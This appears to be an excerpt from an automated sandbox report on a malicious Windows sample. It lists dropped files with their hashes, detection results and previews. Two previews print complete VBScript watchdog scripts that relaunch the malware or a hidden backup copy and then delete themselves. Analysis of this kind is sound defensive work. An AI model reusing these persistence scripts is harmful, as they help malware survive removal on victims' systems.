SSDEEP:	49152:cVtVRFA8evMabRZgEVjPW8bfBodneUXBXw7YKdy2043sjkH:cNR/eUab3W8todenPJcjk
MD5:	97A026B442F5D5739EA3D8565F3A044D
SHA1:	DD409FA09EEDE943173F5AED10542F378062DCB1
SHA-256:	37AFDC07792FE92B790BD6BA935889CEF87B699D9F1A8F86336076F8CF6E4B72
SHA-512:	007B12F6C721AD9681C2013AC0038A23B1DC4BC2FB87C779E85970E820D5F4735C962F05A378ECE3A0F23E4288172CCC43B634DFFDC12A636673852884DD297D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................(..6......~.(.. ....)...@.. ........................)...........@.................................0.(.K....@)......................`)...................................................... ............... ..H............text.....(.. ....(................. ..`.sdata.../....)..0....(.............@....rsrc........@).......).............@..@.reloc.......`).......).............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.log

Download File

Process:	C:\Users\user\Music\ApplicationFrameHost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1673
Entropy (8bit):	5.358592927981826
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHj:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1D
MD5:	F291C90FAC67ABE67847C0904F5FF473
SHA1:	62116C0BF75FB9983D24B6E8D4BBA1A46272BD68
SHA-256:	7B7D839D62C6ACC64FEA99510F7C9BD1D71008DC7573ECE96474BC24F5876D1F
SHA-512:	B99CA9739B59E679B00777DD0C2F77CB0258F79959D0B99BA10139B6C3C3D692859196101BCFC1919933F083153AA2D72976E514F725F909CA2EDD2397C05F9A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Download File

Process:	C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cvXu2RR10n.exe.log

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
MD5:	5D3E8414C47C0F4A064FA0043789EC3E
SHA1:	CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
SHA-256:	4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
SHA-512:	74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

Download File

Process:	C:\Recovery\smartscreen.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.006225694120903
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeYo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiYo+OdBANZD
MD5:	6EC700FCB0AE97553EC01FAEA088C747
SHA1:	2D184B28CB5949B49AD548781AD33CDE9BE1F100
SHA-256:	B60FC2B328749BD47822EE102E4F1D1618278CB6C899C9A2AAEF97C1F6410AEF
SHA-512:	D889E914C32104F69181E9880E4ABE98B71B3BDE0784AA7A8D3F20CE083CFACDB922A63935239339AA195A6B1AEB4C69C994C37A08E041C56A5CB5C91049F9DE
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulVmdtZ:NllUM
MD5:	013016A37665E1E37F0A3576A8EC8324
SHA1:	260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256:	20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512:	99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe

Download File

Process:	C:\Users\user\Music\ApplicationFrameHost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2691584
Entropy (8bit):	7.668413616367881
Encrypted:	false
SSDEEP:	49152:cVtVRFA8evMabRZgEVjPW8bfBodneUXBXw7YKdy2043sjkH:cNR/eUab3W8todenPJcjk
MD5:	97A026B442F5D5739EA3D8565F3A044D
SHA1:	DD409FA09EEDE943173F5AED10542F378062DCB1
SHA-256:	37AFDC07792FE92B790BD6BA935889CEF87B699D9F1A8F86336076F8CF6E4B72
SHA-512:	007B12F6C721AD9681C2013AC0038A23B1DC4BC2FB87C779E85970E820D5F4735C962F05A378ECE3A0F23E4288172CCC43B634DFFDC12A636673852884DD297D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................(..6......~.(.. ....)...@.. ........................)...........@.................................0.(.K....@)......................`)...................................................... ............... ..H............text.....(.. ....(................. ..`.sdata.../....)..0....(.............@....rsrc........@).......).............@..@.reloc.......`).......).............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Music\ApplicationFrameHost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs

Download File

Process:	C:\Users\user\Music\ApplicationFrameHost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	725
Entropy (8bit):	5.233876221275532
Encrypted:	false
SSDEEP:	12:9vWdTzyMsRfhMA6K74jMpiqWouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNig:9AnyHfCAT74j+BpD/AEmHob/uhEjdxWo
MD5:	64AC21C414C2FBF1F1D5867292155F6C
SHA1:	D5E2864AEE4730EEE613CFE345CB96617506E7C2
SHA-256:	1CECBD9FEE5FC7655D6850AA50390C26CD9DFCA7A1322320559F381B901384A6
SHA-512:	0A78D3F9140ECD83E13EF63CAF3FDB9B37D3D2E921D7C74D2B00FC163357DB6E2CEFCA990E2659AEB37320E1CB52DA20EB74FCB83CDD01B087EA25C8FF132A55
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "8268"..mainFilePath = "C:\Users\user\Music\ApplicationFrameHost.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs

Download File

Process:	C:\Users\user\Music\ApplicationFrameHost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	505
Entropy (8bit):	5.286282299899783
Encrypted:	false
SSDEEP:	12:9vWdDIyRfhMAyjMpiqtvZrOLQo0BMhFiXAp4QCk3:9A3fCAyj+3rkvcMDYAp4QCw
MD5:	C7BEE84C2F8C8C2A0E4AAAA6F27A2F99
SHA1:	A78FCB611B393C834D06E9EAC60A1D9CCD1D1DAA
SHA-256:	2315C1CEDFFFABD107A47EEE8019DFC34DB7A069737D6F23ECA1DC0F711F1E85
SHA-512:	C61F24C8C705D41E0D59DF38C90B34E29CAF819BF4D2E79B1A995584B734085D9DB7AA6A849B030D0B0A1C6B5974904F8AD0C78FBB734F8C29FC3414EB4383CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\user\Music\ApplicationFrameHost.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vfw5c3d.c4b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vzg53yf.tsa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yys1jcx.i3c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10n231ah.rv2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cqk2oi1.pnq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xs0dgft.f45.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24ltpqao.zi1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a0oyxk4.exf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bprrxqo.nfv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31adcvmg.mlh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3flaqen4.o5h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44buyjhf.hzp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d3lmztb.3hi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4g4dkjwl.22n.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
